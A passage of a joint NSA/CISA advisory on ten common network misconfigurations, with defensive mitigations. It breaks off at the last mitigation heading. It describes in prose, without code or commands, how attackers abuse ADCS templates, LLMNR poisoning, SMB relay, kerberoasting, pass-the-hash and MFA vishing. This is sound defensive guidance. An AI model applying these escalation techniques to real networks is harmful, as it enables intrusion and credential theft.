A plea for network defenders and software manufacturers to fix common problems.

EXECUTIVE SUMMARY

The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to highlight the most common cybersecurity misconfigurations in large organizations, and detail the tactics, techniques, and procedures (TTPs) actors use to exploit these misconfigurations.

Through NSA and CISA Red and Blue team assessments, as well as through the activities of NSA and CISA Hunt and Incident Response teams, the agencies identified the following 10 most common network misconfigurations:

  1. Default configurations of software and applications
  2. Improper separation of user/administrator privilege
  3. Insufficient internal network monitoring
  4. Lack of network segmentation
  5. Poor patch management
  6. Bypass of system access controls
  7. Weak or misconfigured multifactor authentication (MFA) methods
  8. Insufficient access control lists (ACLs) on network shares and services
  9. Poor credential hygiene
  10. Unrestricted code execution

These misconfigurations illustrate (1) a trend of systemic weaknesses in many large organizations, including those with mature cyber postures, and (2) the importance of software manufacturers embracing secure-by-design principles to reduce the burden on network defenders:

  • Properly trained, staffed, and funded network security teams can implement the known mitigations for these weaknesses.
  • Software manufacturers must reduce the prevalence of these misconfigurations—thus strengthening the security posture for customers—by incorporating secure-by-design and -default principles and tactics into their software development practices.[1]

NSA and CISA encourage network defenders to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of malicious actors exploiting the identified misconfigurations.

  • Remove default credentials and harden configurations.
  • Disable unused services and implement access controls.
  • Update regularly and automate patching, prioritizing patching of known exploited vulnerabilities.[2]
  • Reduce, restrict, audit, and monitor administrative accounts and privileges.

NSA and CISA urge software manufacturers to take ownership of improving security outcomes of their customers by embracing secure-by-design and-default tactics, including:

  • Embedding security controls into product architecture from the start of development and throughout the entire software development lifecycle (SDLC).
  • Eliminating default passwords.
  • Providing high-quality audit logs to customers at no extra charge.
  • Mandating MFA, ideally phishing-resistant, for privileged users and making MFA a default rather than opt-in feature.[3]

Download the PDF version of this report: PDF, 660 KB

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13, and the MITRE D3FEND™ cybersecurity countermeasures framework.[4],[5] See the Appendix: MITRE ATT&CK tactics and techniques section for tables summarizing the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques, and the Mitigations section for MITRE D3FEND countermeasures.

For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.[6],[7]

Overview

Over the years, the following NSA and CISA teams have assessed the security posture of many network enclaves across the Department of Defense (DoD); Federal Civilian Executive Branch (FCEB); state, local, tribal, and territorial (SLTT) governments; and the private sector:

  • Depending on the needs of the assessment, NSA Defensive Network Operations (DNO) teams feature capabilities from Red Team (adversary emulation), Blue Team (strategic vulnerability assessment), Hunt (targeted hunt), and/or Tailored Mitigations (defensive countermeasure development).
  • CISA Vulnerability Management (VM) teams have assessed the security posture of over 1,000 network enclaves. CISA VM teams include Risk and Vulnerability Assessment (RVA) and CISA Red Team Assessments (RTA).[8] The RVA team conducts remote and onsite assessment services, including penetration testing and configuration review. RTA emulates cyber threat actors in coordination with an organization to assess the organization’s cyber detection and response capabilities.
  • CISA Hunt and Incident Response teams conduct proactive and reactive engagements, respectively, on organization networks to identify and detect cyber threats to U.S. infrastructure.

During these assessments, NSA and CISA identified the 10 most common network misconfigurations, which are detailed below. These misconfigurations (non-prioritized) are systemic weaknesses across many networks.

Many of the assessments were of Microsoft® Windows® and Active Directory® environments. This advisory provides details about, and mitigations for, specific issues found during these assessments, and so mostly focuses on these products. However, it should be noted that many other environments contain similar misconfigurations. Network owners and operators should examine their networks for similar misconfigurations even when running other software not specifically mentioned below.

1. Default Configurations of Software and Applications

Default configurations of systems, services, and applications can permit unauthorized access or other malicious activity. Common default configurations include:

  • Default credentials
  • Default service permissions and configurations settings
Default Credentials

Many software manufacturers release commercial off-the-shelf (COTS) network devices —which provide user access via applications or web portals—containing predefined default credentials for their built-in administrative accounts.[9] Malicious actors and assessment teams regularly abuse default credentials by:

  • Finding credentials with a simple web search [T1589.001] and using them [T1078.001] to gain authenticated access to a device.
  • Resetting built-in administrative accounts [T1098] via predictable forgotten passwords questions.
  • Leveraging default virtual private network (VPN) credentials for internal network access [T1133].
  • Leveraging publicly available setup information to identify built-in administrative credentials for web applications and gaining access to the application and its underlying database.
  • Leveraging default credentials on software deployment tools [T1072] for code execution and lateral movement.

In addition to devices that provide network access, printers, scanners, security cameras, conference room audiovisual (AV) equipment, voice over internet protocol (VoIP) phones, and internet of things (IoT) devices commonly contain default credentials that can be used for easy unauthorized access to these devices as well. Further compounding this problem, printers and scanners may have privileged domain accounts loaded so that users can easily scan documents and upload them to a shared drive or email them. Malicious actors who gain access to a printer or scanner using default credentials can use the loaded privileged domain accounts to move laterally from the device and compromise the domain [T1078.002].

Default Service Permissions and Configuration Settings

Certain services may have overly permissive access controls or vulnerable configurations by default. Additionally, even if the providers do not enable these services by default, malicious actors can easily abuse these services if users or administrators enable them.

Assessment teams regularly find the following:

  • Insecure Active Directory Certificate Services
  • Insecure legacy protocols/services
  • Insecure Server Message Block (SMB) service
Insecure Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is a feature used to manage Public Key Infrastructure (PKI) certificates, keys, and encryption inside of Active Directory (AD) environments. ADCS templates are used to build certificates for different types of servers and other entities on an organization’s network.

Malicious actors can exploit ADCS and/or ADCS template misconfigurations to manipulate the certificate infrastructure into issuing fraudulent certificates and/or escalate user privileges to domain administrator privileges. These certificates and domain escalation paths may grant actors unauthorized, persistent access to systems and critical data, the ability to impersonate legitimate entities, and the ability to bypass security measures.

Assessment teams have observed organizations with the following misconfigurations:

  • ADCS servers running with web-enrollment enabled. If web-enrollment is enabled, unauthenticated actors can coerce a server to authenticate to an actor-controlled computer, which can relay the authentication to the ADCS web-enrollment service and obtain a certificate [T1649] for the server’s account. These fraudulent, trusted certificates enable actors to use adversary-in-the-middle techniques [T1557] to masquerade as trusted entities on the network. The actors can also use the certificate for AD authentication to obtain a Kerberos Ticket Granting Ticket (TGT) [T1558.001], which they can use to compromise the server and usually the entire domain.
  • ADCS templates where low-privileged users have enrollment rights, and the enrollee supplies a subject alternative name. Misconfiguring various elements of ADCS templates can result in domain escalation by unauthorized users (e.g., granting low-privileged users certificate enrollment rights, allowing requesters to specify a subjectAltName in the certificate signing request [CSR], not requiring authorized signatures for CSRs, granting FullControl or WriteDacl permissions to users). Malicious actors can use a low-privileged user account to request a certificate with a particular Subject Alternative Name (SAN) and gain a certificate where the SAN matches the User Principal Name (UPN) of a privileged account.

Note: For more information on known escalation paths, including PetitPotam NTLM relay techniques, see: Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints and Certified Pre-Owned, Active Directory Certificate Services.[10],[11],[12]

Insecure legacy protocols/services

Many vulnerable network services are enabled by default, and assessment teams have observed them enabled in production environments. Specifically, assessment teams have observed Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS), which are Microsoft Windows components that serve as alternate methods of host identification. If these services are enabled in a network, actors can use spoofing, poisoning, and relay techniques [T1557.001] to obtain domain hashes, system access, and potential administrative system sessions. Malicious actors frequently exploit these protocols to compromise entire Windows’ environments.

Malicious actors can spoof an authoritative source for name resolution on a target network by responding to passing traffic, effectively poisoning the service so that target computers will communicate with an actor-controlled system instead of the intended one. If the requested system requires identification/authentication, the target computer will send the user’s username and hash to the actor-controlled system. The actors then collect the hash and crack it offline to obtain the plain text password [T1110.002].

Insecure Server Message Block (SMB) service

The Server Message Block service is a Windows component primarily for file sharing. Its default configuration, including in the latest version of Windows, does not require signing network messages to ensure authenticity and integrity. If SMB servers do not enforce SMB signing, malicious actors can use machine-in-the-middle techniques, such as NTLM relay. Further, malicious actors can combine a lack of SMB signing with the name resolution poisoning issue (see above) to gain access to remote systems [T1021.002] without needing to capture and crack any hashes.

2. Improper Separation of User/Administrator Privilege

Administrators often assign multiple roles to one account. These accounts have access to a wide range of devices and services, allowing malicious actors to move through a network quickly with one compromised account without triggering lateral movement and/or privilege escalation detection measures.

Assessment teams have observed the following common account separation misconfigurations:

  • Excessive account privileges
  • Elevated service account permissions
  • Non-essential use of elevated accounts
Excessive Account Privileges

Account privileges are intended to control user access to host or application resources to limit access to sensitive information or enforce a least-privilege security model. When account privileges are overly permissive, users can see and/or do things they should not be able to, which becomes a security issue as it increases risk exposure and attack surface.

Expanding organizations can undergo numerous changes in account management, personnel, and access requirements. These changes commonly lead to privilege creep—the granting of excessive access and unnecessary account privileges. Through the analysis of topical and nested AD groups, a malicious actor can find a user account [T1078] that has been granted account privileges that exceed their need-to-know or least-privilege function. Extraneous access can lead to easy avenues for unauthorized access to data and resources and escalation of privileges in the targeted domain.

Elevated Service Account Permissions

Applications often operate using user accounts to access resources. These user accounts, which are known as service accounts, often require elevated privileges. When a malicious actor compromises an application or service using a service account, they will have the same privileges and access as the service account.

Malicious actors can exploit elevated service permissions within a domain to gain unauthorized access and control over critical systems. Service accounts are enticing targets for malicious actors because such accounts are often granted elevated permissions within the domain due to the nature of the service, and because access to use the service can be requested by any valid domain user. Due to these factors, kerberoasting—a form of credential access achieved by cracking service account credentials—is a common technique used to gain control over service account targets [T1558.003].

Non-Essential Use of Elevated Accounts

IT personnel use domain administrator and other administrator accounts for system and network management due to their inherent elevated privileges. When an administrator account is logged into a compromised host, a malicious actor can steal and use the account’s credentials and an AD-generated authentication token [T1528] to move, using the elevated permissions, throughout the domain [T1550.001]. Using an elevated account for normal day-to-day, non-administrative tasks increases the account’s exposure and, therefore, its risk of compromise and its risk to the network.

Malicious actors prioritize obtaining valid domain credentials upon gaining access to a network. Authentication using valid domain credentials allows the execution of secondary enumeration techniques to gain visibility into the target domain and AD structure, including discovery of elevated accounts and where the elevated accounts are used [T1087].

Targeting elevated accounts (such as domain administrator or system administrators) performing day-to-day activities provides the most direct path to achieve domain escalation. Systems or applications accessed by the targeted elevated accounts significantly increase the attack surface available to adversaries, providing additional paths and escalation options.

After obtaining initial access via an account with administrative permissions, an assessment team compromised a domain in under a business day. The team first gained initial access to the system through phishing [T1566], by which they enticed the end user to download [T1204] and execute malicious payloads. The targeted end-user account had administrative permissions, enabling the team to quickly compromise the entire domain.

3. Insufficient Internal Network Monitoring

Some organizations do not optimally configure host and network sensors for traffic collection and end-host logging. These insufficient configurations could lead to undetected adversarial compromise. Additionally, improper sensor configurations limit the traffic collection capability needed for enhanced baseline development and detract from timely detection of anomalous activity.

Assessment teams have exploited insufficient monitoring to gain access to assessed networks. For example:

  • An assessment team observed an organization with host-based monitoring, but no network monitoring. Host-based monitoring informs defensive teams about adverse activities on singular hosts and network monitoring informs about adverse activities traversing hosts [TA0008]. In this example, the organization could identify infected hosts but could not identify where the infection was coming from, and thus could not stop future lateral movement and infections.
  • An assessment team gained persistent deep access to a large organization with a mature cyber posture. The organization did not detect the assessment team’s lateral movement, persistence, and command and control (C2) activity, including when the team attempted noisy activities to trigger a security response. For more information on this activity, see CSA CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks.[13]

4. Lack of Network Segmentation

Network segmentation separates portions of the network with security boundaries. Lack of network segmentation leaves no security boundaries between the user, production, and critical system networks. Insufficient network segmentation allows an actor who has compromised a resource on the network to move laterally across a variety of systems uncontested. Lack of network segregation additionally leaves organizations significantly more vulnerable to potential ransomware attacks and post-exploitation techniques.

Lack of segmentation between IT and operational technology (OT) environments places OT environments at risk. For example, assessment teams have often gained access to OT networks—despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network—by finding special purpose, forgotten, or even accidental network connections [T1199].

5. Poor Patch Management

Vendors release patches and updates to address security vulnerabilities. Poor patch management and network hygiene practices often enable adversaries to discover open attack vectors and exploit critical vulnerabilities. Poor patch management includes:

  • Lack of regular patching
  • Use of unsupported operating systems (OSs) and outdated firmware
Lack of Regular Patching

Failure to apply the latest patches can leave a system open to compromise from publicly available exploits. Due to their ease of discovery—via vulnerability scanning [T1595.002] and open source research [T1592]—and exploitation, these systems are immediate targets for adversaries. Allowing critical vulnerabilities to remain on production systems without applying their corresponding patches significantly increases the attack surface. Organizations should prioritize patching known exploited vulnerabilities in their environments.[2]

Assessment teams have observed threat actors exploiting many CVEs in public-facing applications [T1190], including:

  • CVE-2019-18935 in an unpatched instance of Telerik® UI for ASP.NET running on a Microsoft IIS server.[14]
  • CVE-2021-44228 (Log4Shell) in an unpatched VMware® Horizon server.[15]
  • CVE-2022-24682, CVE-2022-27924, and CVE-2022-27925 chained with CVE-2022-37042, or CVE-2022-30333 in an unpatched Zimbra® Collaboration Suite.[16]
Use of Unsupported OSs and Outdated Firmware

Using software or hardware that is no longer supported by the vendor poses a significant security risk because new and existing vulnerabilities are no longer patched. Malicious actors can exploit vulnerabilities in these systems to gain unauthorized access, compromise sensitive data, and disrupt operations [T1210].

Assessment teams frequently observe organizations using unsupported Windows operating systems without updates MS17-010 and MS08-67. These updates, released years ago, address critical remote code execution vulnerabilities.[17],[18]

6. Bypass of System Access Controls

A malicious actor can bypass system access controls by compromising alternate authentication methods in an environment. If a malicious actor can collect hashes in a network, they can use the hashes to authenticate using non-standard means, such as pass-the-hash (PtH) [T1550.002]. By mimicking accounts without the clear-text password, an actor can expand and fortify their access without detection. Kerberoasting is also one of the most time-efficient ways to elevate privileges and move laterally throughout an organization’s network.

7. Weak or Misconfigured MFA Methods

Misconfigured Smart Cards or Tokens

Some networks (generally government or DoD networks) require accounts to use smart cards or tokens. Multifactor requirements can be misconfigured so the password hashes for accounts never change. Even though the password itself is no longer used—because the smart card or token is required instead—there is still a password hash for the account that can be used as an alternative credential for authentication. If the password hash never changes, once a malicious actor has an account’s password hash [T1111], the actor can use it indefinitely, via the PtH technique for as long as that account exists.

Lack of Phishing-Resistant MFA

Some forms of MFA are vulnerable to phishing, “push bombing” [T1621], exploitation of Signaling System 7 (SS7) protocol vulnerabilities, and/or “SIM swap” techniques. These attempts, if successful, may allow a threat actor to gain access to MFA authentication credentials or bypass MFA and access the MFA-protected systems. (See CISA’s Fact Sheet Implementing Phishing-Resistant MFA for more information.)[3]

For example, assessment teams have used voice phishing to convince users to provide missing MFA information [T1598]. In one instance, an assessment team knew a user’s main credentials, but their login attempts were blocked by MFA requirements. The team then masqueraded as IT staff and convinced the user to provide the MFA code over the phone, allowing the team to complete their login attempt and gain access to the user’s email and other organizational resources.

8. Insufficient ACLs on Network Shares and Services

Data shares and repositories are primary targets for malicious actors. Network administrators may improperly configure ACLs to allow for unauthorized users to access sensitive or administrative data on shared drives.

Actors can use commands, open source tools, or custom malware to look for shared folders and drives [T1135].

  • In one compromise, a team observed actors use the net share command—which displays information about shared resources on the local computer—and the ntfsinfo command to search network shares on compromised computers. In the same compromise, the actors used a custom tool, CovalentStealer, which is designed to identify file shares on a system, categorize the files [T1083], and upload the files to a remote server [TA0010].[19],[20]
  • Ransomware actors have used the SoftPerfect® Network Scanner, netscan.exe—which can ping computers [T1018], scan ports [T1046], and discover shared folders—and SharpShares to enumerate accessible network shares in a domain.[21],[22]

Malicious actors can then collect and exfiltrate the data from the shared drives and folders. They can then use the data for a variety of purposes, such as extortion of the organization or as intelligence when formulating intrusion plans for further network compromise. Assessment teams routinely find sensitive information on network shares [T1039] that could facilitate follow-on activity or provide opportunities for extortion. Teams regularly find drives containing cleartext credentials [T1552] for service accounts, web applications, and even domain administrators.

Even when further access is not directly obtained from credentials in file shares, there can be a treasure trove of information for improving situational awareness of the target network, including the network’s topology, service tickets, or vulnerability scan data. In addition, teams regularly identify sensitive data and PII on shared drives (e.g., scanned documents, social security numbers, and tax returns) that could be used for extortion or social engineering of the organization or individuals.

9. Poor Credential Hygiene

Poor credential hygiene facilitates threat actors in obtaining credentials for initial access, persistence, lateral movement, and other follow-on activity, especially if phishing-resistant MFA is not enabled. Poor credential hygiene includes:

  • Easily crackable passwords
  • Cleartext password disclosure
Easily Crackable Passwords

Easily crackable passwords are passwords that a malicious actor can guess within a short time using relatively inexpensive computing resources. The presence of easily crackable passwords on a network generally stems from a lack of password length (i.e., shorter than 15 characters) and randomness (i.e., is not unique or can be guessed). This is often due to lax requirements for passwords in organizational policies and user training. A policy that only requires short and simple passwords leaves user passwords susceptible to password cracking. Organizations should provide or allow employee use of password managers to enable the generation and easy use of secure, random passwords for each account.

Often, when a credential is obtained, it is a hash (one-way encryption) of the password and not the password itself. Although some hashes can be used directly with PtH techniques, many hashes need to be cracked to obtain usable credentials. The cracking process takes the captured hash of the user’s plaintext password and leverages dictionary wordlists and rulesets, often using a database of billions of previously compromised passwords, in an attempt to find the matching plaintext password [T1110.002].

One of the primary ways to crack passwords is with the open source tool, Hashcat, combined with password lists obtained from publicly released password breaches. Once a malicious actor has access to a plaintext password, they are usually limited only by the account’s permissions. In some cases, the actor may be restricted or detected by advanced defense-in-depth and zero trust implementations as well, but this has been a rare finding in assessments thus far.

Assessment teams have cracked password hashes for NTLM users, Kerberos service account tickets, NetNTLMv2, and PFX stores [T1555], enabling the team to elevate privileges and move laterally within networks. In 12 hours, one team cracked over 80% of all users’ passwords in an Active Directory, resulting in hundreds of valid credentials.

Cleartext Password Disclosure

Storing passwords in cleartext is a serious security risk. A malicious actor with access to files containing cleartext passwords [T1552.001] could use these credentials to log into the affected applications or systems under the guise of a legitimate user. Accountability is lost in this situation as any system logs would record valid user accounts accessing applications or systems.

Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining cleartext passwords. Assessment teams frequently discover cleartext passwords, allowing them to quickly escalate the emulated intrusion from the compromise of a regular domain user account to that of a privileged account, such as a Domain or Enterprise Administrator. A common tool used for locating cleartext passwords is the open source tool, Snaffler.[23]

10. Unrestricted Code Execution

If unverified programs are allowed to execute on hosts, a threat actor can run arbitrary, malicious payloads within a network.

Malicious actors often execute code after gaining initial access to a system. For example, after a user falls for a phishing scam, the actor usually convinces the victim to run code on their workstation to gain remote access to the internal network. This code is usually an unverified program that has no legitimate purpose or business reason for running on the network.

Assessment teams and malicious actors frequently leverage unrestricted code execution in the form of executables, dynamic link libraries (DLLs), HTML applications, and macros (scripts used in office automation documents) [T1059.005] to establish initial access, persistence, and lateral movement. In addition, actors often use scripting languages [T1059] to obscure their actions [T1027.010] and bypass allowlisting—where organizations restrict applications and other forms of code by default and only allow those that are known and trusted. Further, actors may load vulnerable drivers and then exploit the drivers’ known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device [T1068].

MITIGATIONS

Network Defenders

NSA and CISA recommend network defenders implement the recommendations that follow to mitigate the issues identified in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST) as well as with the MITRE ATT&CK Enterprise Mitigations and MITRE D3FEND frameworks.

The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.[24]

Mitigate Default Configurations of Software and Applications
MisconfigurationRecommendations for Network Defenders
Default configurations of software and applicationsModify the default configuration of applications and appliances before deployment in a production environment [M1013],[D3-ACH]. Refer to hardening guidelines provided by the vendor and related cybersecurity guidance (e.g., DISA’s Security Technical Implementation Guides (STIGs) and configuration guides).[25],[26],[27]
Default configurations of software and applications: Default CredentialsChange or disable vendor-supplied default usernames and passwords of services, software, and equipment when installing or commissioning [CPG 2.A]. When resetting passwords, enforce the use of “strong” passwords (i.e., passwords that are more than 15 characters and random [CPG 2.B]) and follow hardening guidelines provided by the vendor, STIGsNSA, and/or NIST [M1027],[D3-SPP].[25],[26],[28],[29]
Default service permissions and configuration settings: Insecure Active Directory Certificate ServicesEnsure the secure configuration of ADCS implementations. Regularly update and patch the controlling infrastructure (e.g., for CVE-2021-36942), employ monitoring and auditing mechanisms, and implement strong access controls to protect the infrastructure.If not needed, disable web-enrollment in ADCS servers. See Microsoft: Uninstall-AdcsWebEnrollment (ADCSDeployment) for guidance.[30]If web enrollment is needed on ADCS servers:Enable Extended Protection for Authentication (EPA) for Client Authority Web Enrollment. This is done by choosing the “Required” option. For guidance, see Microsoft: KB5021989: Extended Protection for Authentication.[31]Enable “Require SSL” on the ADCS server.Disable NTLM on all ADCS servers. For guidance, see Microsoft: Network security Restrict NTLM in this domain – Windows Security | Microsoft Learn and Network security Restrict NTLM Incoming NTLM traffic – Windows Security.[32],[33]Disable SAN for UPN Mapping. For guidance see, Microsoft: How to disable the SAN for UPN mapping – Windows Server. Instead, smart card authentication can use the altSecurityIdentities attribute for explicit mapping of certificates to accounts more securely.[34]Review all permissions on the ADCS templates on applicable servers. Restrict enrollment rights to only those users or groups that require it. Disable the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag from templates to prevent users from supplying and editing sensitive security settings within these templates. Enforce manager approval for requested certificates. Remove FullControlWriteDacl, and Write property permissions from low-privileged groups, such as domain users, to certificate template objects.
Default service permissions and configuration settings: Insecure legacy protocols/servicesDetermine if LLMNR and NetBIOS are required for essential business operations.If not required, disable LLMNR and NetBIOS in local computer security settings or by group policy.
Default service permissions and configuration settings: Insecure SMB serviceRequire SMB signing for both SMB client and server on all systems.[25] This should prevent certain adversary-in-the-middle and pass-the-hash techniques. For more information on SMB signing, see Microsoft: Overview of Server Message Block Signing. [35] Note: Beginning in Microsoft Windows 11 Insider Preview Build 25381, Windows requires SMB signing for all communications.[36]
Mitigate Improper Separation of User/Administrator Privilege
MisconfigurationRecommendations for Network Defenders
Improper separation of user/administrator privilege:Excessive account privileges,Elevated service account permissions, andNon-essential use of elevated accountsImplement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform, and review logs of user actions to detect unauthorized use and abuse. Apply least privilege principles to user accounts and groups allowing only the performance of authorized actions.Audit user accounts and remove those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.Restrict use of privileged accounts to perform general tasks, such as accessing emails and browsing the Internet [CPG 2.E],[D3-UAP]. See NSA Cybersecurity Information Sheet (CSI) Defend Privileges and Accounts for more information.[37]Limit the number of users within the organization with an identity and access management (IAM) role that has administrator privileges. Strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles, and policies.Implement time-based access for privileged accounts. For example, the just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model) by setting network-wide policy to automatically disable admin accounts at the Active Directory level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. In cloud environments, just-in-time elevation is also appropriate and may be implemented using per-session federated claims or privileged access management tools.Restrict domain users from being in the local administrator group on multiple systems.Run daemonized applications (services) with non-administrator accounts when possible.Only configure service accounts with the permissions necessary for the services they control to operate.Disable unused services and implement ACLs to protect services.
Mitigate Insufficient Internal Network Monitoring
MisconfigurationRecommendations for Network Defenders
Insufficient internal network monitoringEstablish a baseline of applications and services, and routinely audit their access and use, especially for administrative activity [D3-ANAA]. For instance, administrators should routinely audit the access lists and permissions for of all web applications and services [CPG 2.O],[M1047]. Look for suspicious accounts, investigate them, and remove accounts and credentials, as appropriate, such as accounts of former staff.[39]Establish a baseline that represents an organization’s normal traffic activity, network performance, host application activity, and user behavior; investigate any deviations from that baseline [D3-NTCD],[D3-CSPP],[D3-UBA].[40]Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them [M1047].Implement a security information and event management (SIEM) system to provide log aggregation, correlation, querying, visualization, and alerting from network endpoints, logging systems, endpoint and detection response (EDR) systems and intrusion detection systems (IDS) [CPG 2.T],[D3-NTA].
Mitigate Lack of Network Segmentation
MisconfigurationRecommendations for Network Defenders
Lack of network segmentationImplement next-generation firewalls to perform deep packet filtering, stateful inspection, and application-level packet inspection [D3-NTF]. Deny or drop improperly formatted traffic that is incongruent with application-specific traffic permitted on the network. This practice limits an actor’s ability to abuse allowed application protocols. The practice of allowlisting network applications does not rely on generic ports as filtering criteria, enhancing filtering fidelity. For more information on application-aware defenses, see NSA CSI Segment Networks and Deploy Application-Aware Defenses.[41]Engineer network segments to isolate critical systems, functions, and resources [CPG 2.F],[D3-NI]. Establish physical and logical segmentation controls, such as virtual local area network (VLAN) configurations and properly configured access control lists (ACLs) on infrastructure devices [M1030]. These devices should be baselined and audited to prevent access to potentially sensitive systems and information. Leverage properly configured Demilitarized Zones (DMZs) to reduce service exposure to the Internet.[42],[43],[44]Implement separate Virtual Private Cloud (VPC) instances to isolate essential cloud systems. Where possible, implement Virtual Machines (VM) and Network Function Virtualization (NFV) to enable micro-segmentation of networks in virtualized environments and cloud data centers. Employ secure VM firewall configurations in tandem with macro segmentation.
Mitigate Poor Patch Management
MisconfigurationRecommendations for Network Defenders
Poor patch management: Lack of regular patchingEnsure organizations implement and maintain an efficient patch management process that enforces the use of up-to-date, stable versions of OSs, browsers, and software [M1051],[D3-SU].[45]Update software regularly by employing patch management for externally exposed applications, internal enterprise endpoints, and servers. Prioritize patching known exploited vulnerabilities.[2]Automate the update process as much as possible and use vendor-provided updates. Consider using automated patch management tools and software update tools.Where patching is not possible due to limitations, segment networks to limit exposure of the vulnerable system or host.
Poor patch management: Use of unsupported OSs and outdated firmwareEvaluate the use of unsupported hardware and software and discontinue use as soon as possible. If discontinuing is not possible, implement additional network protections to mitigate the risk.[45]Patch the Basic Input/Output System (BIOS) and other firmware to prevent exploitation of known vulnerabilities.
Mitigate Bypass of System Access Controls
MisconfigurationRecommendations for Network Defenders
Bypass of system access controlsLimit credential overlap across systems to prevent credential compromise and reduce a malicious actor’s ability to move laterally between systems [M1026],[D3-CH]. Implement a method for monitoring non-standard logon events through host log monitoring [CPG 2.G].Implement an effective and routine patch management process. Mitigate PtH techniques by applying patch KB2871997 to Windows 7 and newer versions to limit default access of accounts in the local administrator group [M1051],[D3-SU].[46]Enable the PtH mitigations to apply User Account Control (UAC) restrictions to local accounts upon network logon [M1052],[D3-UAP].Deny domain users the ability to be in the local administrator group on multiple systems [M1018],[D3-UAP].Limit workstation-to-workstation communications. All workstation communications should occur through a server to prevent lateral movement [M1018],[D3-UAP].Use privileged accounts only on systems requiring those privileges [M1018],[D3-UAP]. Consider using dedicated Privileged Access Workstations for privileged accounts to better isolate and protect them.[37]
Mitigate Weak or Misconfigured MFA Methods
MisconfigurationRecommendations for Network Defenders
Weak or misconfigured MFA methods: Misconfigured smart cards or tokens In Windows environments:Disable the use of New Technology LAN Manager (NTLM) and other legacy authentication protocols that are susceptible to PtH due to their use of password hashes [M1032],[D3-MFA]. For guidance, see Microsoft: Network security Restrict NTLM in this domain – Windows Security | Microsoft Learn and Network security Restrict NTLM Incoming NTLM traffic – Windows Security.[32],[33]Use built-in functionality via Windows Hello for Business or Group Policy Objects (GPOs) to regularly re-randomize password hashes associated with smartcard-required accounts. Ensure that the hashes are changed at least as often as organizational policy requires passwords to be changed [M1027],[D3-CRO]. Prioritize upgrading any environments that cannot utilize this built-in functionality.As a longer-term effort, implement cloud-primary authentication solution using modern open standards. See CISA’s Secure Cloud Business Applications (SCuBA) Hybrid Identity Solutions Architecture for more information.[47] Note: this document is part of CISA’s Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies to secure their cloud business application environments and to protect federal information that is created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project’s guidance is applicable to all organizations.[48]
Weak or misconfigured MFA methods: Lack of phishing-resistant MFAEnforce phishing-resistant MFA universally for access to sensitive data and on as many other resources and services as possible [CPG 2.H].[3],[49]
Mitigate Insufficient ACLs on Network Shares and Services
MisconfigurationRecommendations for Network Defenders
Insufficient ACLs on network shares and servicesImplement secure configurations for all storage devices and network shares that grant access to authorized users only.Apply the principal of least privilege to important information resources to reduce risk of unauthorized data access and manipulation.Apply restrictive permissions to files and directories, and prevent adversaries from modifying ACLs [M1022],[D3-LFP].Set restrictive permissions on files and folders containing sensitive private keys to prevent unintended access [M1022],[D3-LFP].Enable the Windows Group Policy security setting, “Do Not Allow Anonymous Enumeration of Security Account Manager (SAM) Accounts and Shares,” to limit users who can enumerate network shares.
Mitigate Poor Credential Hygiene
MisconfigurationRecommendations for Network Defenders
Poor credential hygiene: easily crackable passwords Follow National Institute of Standards and Technologies (NIST) guidelines when creating password policies to enforce use of “strong” passwords that cannot be cracked [M1027],[D3-SPP].[29] Consider using password managers to generate and store passwords.Do not reuse local administrator account passwords across systems. Ensure that passwords are “strong” and unique [CPG 2.B],[M1027],[D3-SPP].Use “strong” passphrases for private keys to make cracking resource intensive. Do not store credentials within the registry in Windows systems. Establish an organizational policy that prohibits password storage in files.Ensure adequate password length (ideally 25+ characters) and complexity requirements for Windows service accounts and implement passwords with periodic expiration on these accounts [CPG 2.B],[M1027],[D3-SPP]. Use Managed Service Accounts, when possible, to manage service account passwords automatically.
Poor credential hygiene: cleartext password disclosure Implement a review process for files and systems to look for cleartext account credentials. When credentials are found, remove, change, or encrypt them [D3-FE]. Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, protected health information) or credentials are stored. Weigh the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is of significant concern, technical controls, policy, and user training may prevent storage of credentials in improper locations.Store hashed passwords using Committee on National Security Systems Policy (CNSSP)-15 and Commercial National Security Algorithm Suite (CNSA) approved algorithms.[50],[51]Consider using group Managed Service Accounts (gMSAs) or third-party software to implement secure password-storage applications.
Mitigate Unrestricted Code Execution
MisconfigurationRecommendations for Network Defenders
